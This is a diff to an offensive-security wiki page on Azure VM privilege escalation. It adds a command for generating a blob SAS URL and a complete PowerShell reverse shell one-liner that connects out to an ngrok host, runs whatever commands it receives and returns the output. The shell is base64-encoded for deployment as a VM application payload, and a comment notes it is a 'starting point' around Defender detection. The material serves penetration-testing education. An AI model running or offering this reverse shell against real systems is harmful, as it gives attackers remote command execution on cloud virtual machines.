a

Author: carlospolop

src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md

@@ -219,6 +219,24 @@ az vm application set \
    --name <vm-name> \
    --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
    --treat-deployment-as-failure true
+
+
+# You can create a SAS URL from a blob with something like:
+export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export URL_PACKAGE=$(az storage blob generate-sas \
+  --account-name <acc-name> \
+  --container-name <container-name> \
+  --name <filename> \
+  --permissions r \
+  --expiry "$EXPIRY" \
+  --https-only \
+  --full-uri \
+  -o tsv)
+
+# Alternative commands for Powrhsell reverse shell
+## Note that this would be detected by Defender (but it's an extarting point)
+## Add in the install, remove and update commands
+echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
 ```
 
 {{#endtab }}